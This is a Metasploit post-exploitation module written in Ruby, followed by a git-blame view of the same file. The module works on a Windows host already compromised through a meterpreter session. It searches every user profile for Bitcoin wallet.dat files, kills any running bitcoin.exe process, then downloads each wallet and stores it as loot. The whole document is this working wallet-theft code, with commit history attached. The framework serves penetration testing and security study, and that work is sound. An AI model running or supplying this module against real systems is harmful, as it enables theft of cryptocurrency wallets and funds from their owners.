metasploit-framework/modules/post/windows/gather/bitcoin_jacker.rb

# $Id$

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'
require 'msf/core/auxiliary/report'

class Metasploit3 < Msf::Post
	include Msf::Auxiliary::Report
	include Msf::Post::Windows::UserProfiles

	def initialize(info={})
		super( update_info( info,
				'Name'          => 'Windows Gather Bitcoin wallet.dat',
				'Description'   => %q{
					This module downloads any Bitcoin wallet.dat files from the target system
				},
				'License'       => MSF_LICENSE,
				'Author'        => [ 'illwill <illwill[at]illmob.org>'],
				'Version'       => '$Revision$',
				'Platform'      => [ 'win' ],
				'SessionTypes'  => [ 'meterpreter' ]
			))
	end

	def run
		print_status("Checking All Users For Bitcoin Wallet...")
		grab_user_profiles().each do |user|
			next if user['AppData'] == nil
			tmpath= user['AppData'] + "\\Bitcoin\\wallet.dat"
			jack_wallet(tmpath)
		end
	end

	def jack_wallet(filename)
		data     = ""
		found    = session.fs.file.stat(filename) rescue nil
		return if not found

		print_status("Wallet Found At #{filename}")
		print_status("     Jackin their wallet...")

		kill_bitcoin

		begin
			wallet = session.fs.file.new(filename, "rb")
			until wallet.eof?
				data << wallet.read
			end

			store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
			print_status("     Wallet Jacked.")
		rescue ::Interrupt
			raise $!
		rescue ::Exception => e
			print_error("Failed to download #{filename}: #{e.class} #{e}")
		end
	end

	def kill_bitcoin
		client.sys.process.get_processes().each do |x|
			if x['name'].downcase == "bitcoin.exe"
				print_status("     #{x['name']} Process Found...")
				print_status("     Killing Process ID #{x['pid']}...")
				session.sys.process.kill(x['pid']) rescue nil
			end
		end
	end

end
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`# $Id$`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`##`

			`require 'msf/core'`
			`require 'rex'`
Added patch from thelightcosine for profile mixin git-svn-id: file:///home/svn/framework3/trunk@13393 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-28 22:56:40 +00:00			`require 'msf/core/post/windows/user_profiles'`
Require's for all the include's 2012-10-23 18:24:05 +00:00			`require 'msf/core/auxiliary/report'`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00
			`class Metasploit3 < Msf::Post`
			`include Msf::Auxiliary::Report`
Added patch from thelightcosine for profile mixin git-svn-id: file:///home/svn/framework3/trunk@13393 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-28 22:56:40 +00:00			`include Msf::Post::Windows::UserProfiles`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00
			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Windows Gather Bitcoin wallet.dat',`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`'Description' => %q{`
Added patch from thelightcosine for profile mixin git-svn-id: file:///home/svn/framework3/trunk@13393 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-28 22:56:40 +00:00			`This module downloads any Bitcoin wallet.dat files from the target system`
			`},`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`'License' => MSF_LICENSE,`
Exercising my author e-mail format dictatorship for some of the win gather post mods git-svn-id: file:///home/svn/framework3/trunk@13296 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-22 20:09:26 +00:00			`'Author' => [ 'illwill <illwill[at]illmob.org>'],`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`'Version' => '$Revision$',`
Platform windows cleanup Change all Platform 'windows' to 'win', as it internally is an alias anyway and only causes unnecessary confusion to have two platform names that mean the same. 2012-10-23 18:33:01 +00:00			`'Platform' => [ 'win' ],`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`'SessionTypes' => [ 'meterpreter' ]`
			`))`
			`end`

			`def run`
			`print_status("Checking All Users For Bitcoin Wallet...")`
Added patch from thelightcosine for profile mixin git-svn-id: file:///home/svn/framework3/trunk@13393 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-28 22:56:40 +00:00			`grab_user_profiles().each do \|user\|`
			`next if user['AppData'] == nil`
			`tmpath= user['AppData'] + "\\Bitcoin\\wallet.dat"`
			`jack_wallet(tmpath)`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`end`
			`end`

Added patch from thelightcosine for profile mixin git-svn-id: file:///home/svn/framework3/trunk@13393 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-28 22:56:40 +00:00			`def jack_wallet(filename)`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`data = ""`
Added patch from thelightcosine for profile mixin git-svn-id: file:///home/svn/framework3/trunk@13393 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-28 22:56:40 +00:00			`found = session.fs.file.stat(filename) rescue nil`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`return if not found`
Fix: whitespaces, svn propset, author e-mail format git-svn-id: file:///home/svn/framework3/trunk@14175 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-06 22:02:26 +00:00
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`print_status("Wallet Found At #{filename}")`
			`print_status(" Jackin their wallet...")`
Fix: whitespaces, svn propset, author e-mail format git-svn-id: file:///home/svn/framework3/trunk@14175 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-06 22:02:26 +00:00
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`kill_bitcoin`
Fix: whitespaces, svn propset, author e-mail format git-svn-id: file:///home/svn/framework3/trunk@14175 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-06 22:02:26 +00:00
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`begin`
			`wallet = session.fs.file.new(filename, "rb")`
			`until wallet.eof?`
			`data << wallet.read`
big msftidy pass, ping me if there are issues git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-23 11:56:13 +00:00			`end`
Fix: whitespaces, svn propset, author e-mail format git-svn-id: file:///home/svn/framework3/trunk@14175 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-06 22:02:26 +00:00
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")`
			`print_status(" Wallet Jacked.")`
Msftidy: knocking out all those trailing spaces. Screw those guys. git-svn-id: file:///home/svn/framework3/trunk@13967 4d416f70-5f16-0410-b530-b9f4589650da 2011-10-17 03:49:49 +00:00			`rescue ::Interrupt`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`raise $!`
			`rescue ::Exception => e`
Fix: whitespaces, svn propset, author e-mail format git-svn-id: file:///home/svn/framework3/trunk@14175 4d416f70-5f16-0410-b530-b9f4589650da 2011-11-06 22:02:26 +00:00			`print_error("Failed to download #{filename}: #{e.class} #{e}")`
This adds IllWill's Bitcoin waller.dat Post module git-svn-id: file:///home/svn/framework3/trunk@12993 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 03:26:07 +00:00			`end`
			`end`

			`def kill_bitcoin`
			`client.sys.process.get_processes().each do \|x\|`
			`if x['name'].downcase == "bitcoin.exe"`
			`print_status(" #{x['name']} Process Found...")`
			`print_status(" Killing Process ID #{x['pid']}...")`
			`session.sys.process.kill(x['pid']) rescue nil`
			`end`
			`end`
			`end`

			`end`